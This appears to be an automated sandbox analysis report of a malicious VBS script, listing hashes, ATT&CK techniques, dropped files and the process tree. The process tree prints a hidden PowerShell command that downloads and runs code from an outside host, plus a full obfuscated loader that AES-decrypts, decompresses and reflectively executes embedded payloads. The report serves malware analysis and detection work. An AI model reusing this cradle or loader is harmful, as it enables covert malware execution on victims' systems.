f24da1d458f078adf96dca79955313eea5cfe7a6a36334b1352553a31928cec6

General

Target

f24da1d458f078adf96dca79955313eea5cfe7a6a36334b1352553a31928cec6.vbs
Size

78KB
MD5

ab631b79a8f6cc0f48e17765c33c8fee
SHA1

539298c574b25b70379fccd8c47c3dbee5184877
SHA256

f24da1d458f078adf96dca79955313eea5cfe7a6a36334b1352553a31928cec6
SHA512

0e5818d2c4eca342c7b8ece7c8f14028e34d00e2c83f0d3c72ceaeb0380fc568ceb02df8e5743b9a691d85cc462863bceb68ccb1cf499994fe0e523debe6e550
SSDEEP

1536:rtYq5Mv5eaBf+kvAQKCidRC0Xe6Tw/LP5KU52t+gN4:lmRea3vAWGOyZsu4

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
768	powershell.exe
2708	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
768	powershell.exe
2708	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	768	powershell.exe
Token: SeDebugPrivilege	2708	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2380 wrote to memory of 768	2380	WScript.exe	30
PID 2380 wrote to memory of 768	2380	WScript.exe	30
PID 2380 wrote to memory of 768	2380	WScript.exe	30
PID 2380 wrote to memory of 2676	2380	WScript.exe	33
PID 2380 wrote to memory of 2676	2380	WScript.exe	33
PID 2380 wrote to memory of 2676	2380	WScript.exe	33
PID 2676 wrote to memory of 2004	2676	cmd.exe	35
PID 2676 wrote to memory of 2004	2676	cmd.exe	35
PID 2676 wrote to memory of 2004	2676	cmd.exe	35
PID 2676 wrote to memory of 2708	2676	cmd.exe	36
PID 2676 wrote to memory of 2708	2676	cmd.exe	36
PID 2676 wrote to memory of 2708	2676	cmd.exe	36

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f24da1d458f078adf96dca79955313eea5cfe7a6a36334b1352553a31928cec6.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2380
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:768
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xZeq9DIcMp8T9I70bsZRE1uAqlMKnnwxo9STrCb0BJQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wSiqGPKdEt2A2oq502N0Dw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $WbLZH=New-Object System.IO.MemoryStream(,$param_var); $YROuh=New-Object System.IO.MemoryStream; $FnRtc=New-Object System.IO.Compression.GZipStream($WbLZH, [IO.Compression.CompressionMode]::Decompress); $FnRtc.CopyTo($YROuh); $FnRtc.Dispose(); $WbLZH.Dispose(); $YROuh.Dispose(); $YROuh.ToArray();}function execute_function($param_var,$param2_var){ $JFUbC=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vIQTp=$JFUbC.EntryPoint; $vIQTp.Invoke($null, $param2_var);}$LMlhd = 'C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $LMlhd;$qwcXI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($LMlhd).Split([Environment]::NewLine);foreach ($RYDhX in $qwcXI) { if ($RYDhX.StartsWith('qSryZxtgHRJoDBkXgCTa')) { $MiSte=$RYDhX.Substring(20); break; }}$payloads_var=[string[]]$MiSte.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:2004
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2708

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\system.bat

Filesize
69KB

MD5
9a7ec81cc371860d03b51764e8eade97

SHA1
3a22f9120587dc2fc84765efde70586fd0775fdf

SHA256
20a77dbb7b4438cc9cfa45e1a3de33b7100b039ca7f8838a12d09273f55dbe3e

SHA512
9d3a4c525b0f811ab9fb57787c16ce32dcba714fea558c5f3364703a20f232ece58a83c0edf3294a62d92ce52b3878f50f1c30ef6687d1e37e855f0f069331bb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
6acb5650f03d7c7514d6796504268179

SHA1
f8a6b294f1dde081df0a4d693ed6cef4300507ab

SHA256
5aa94cb822563c674c3c55fb49ab372f77b4f430a2f6a6e81c24ac5b70667915

SHA512
a7e687f71ee006493d0b93907ab5785b06d15372ef608d818f48b8582673418f94b661d1c37ee58bce02b9fd0b8f44d2872da4b24d6995a02b483819baae524f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KPL6LDMJKZRA0XX0GP1O.temp

Filesize
7KB

MD5
2e7ac1d74c367e92c710f2d9593fd779

SHA1
781a8c28f17a5199a33a9f349b27439fd0b75b0b

SHA256
3e03002dc7f3be737affd0367c2a45f1dde60d706f69b6e2ccabe189f834e671

SHA512
480754f81abf822338f0a23a175d9858bdb565249ffc2dc5aaabc31075e32e58bd68a49e9c19dc03b06a12eadf0744edadb382ffa2ae23d0fff9654e89561074

Download Submit
memory/768-5-0x000007FEF56A0000-0x000007FEF603D000-memory.dmp

Filesize
9.6MB

Download
memory/768-8-0x000007FEF56A0000-0x000007FEF603D000-memory.dmp

Filesize
9.6MB

Download
memory/768-9-0x000007FEF56A0000-0x000007FEF603D000-memory.dmp

Filesize
9.6MB

Download
memory/768-10-0x000007FEF56A0000-0x000007FEF603D000-memory.dmp

Filesize
9.6MB

Download
memory/768-11-0x000007FEF56A0000-0x000007FEF603D000-memory.dmp

Filesize
9.6MB

Download
memory/768-4-0x000007FEF595E000-0x000007FEF595F000-memory.dmp

Filesize
4KB

Download
memory/768-7-0x00000000022E0000-0x00000000022E8000-memory.dmp

Filesize
32KB

Download
memory/768-6-0x000000001B470000-0x000000001B752000-memory.dmp

Filesize
2.9MB

Download
memory/2708-26-0x000000001B1F0000-0x000000001B4D2000-memory.dmp

Filesize
2.9MB

Download
memory/2708-27-0x0000000001E80000-0x0000000001E88000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing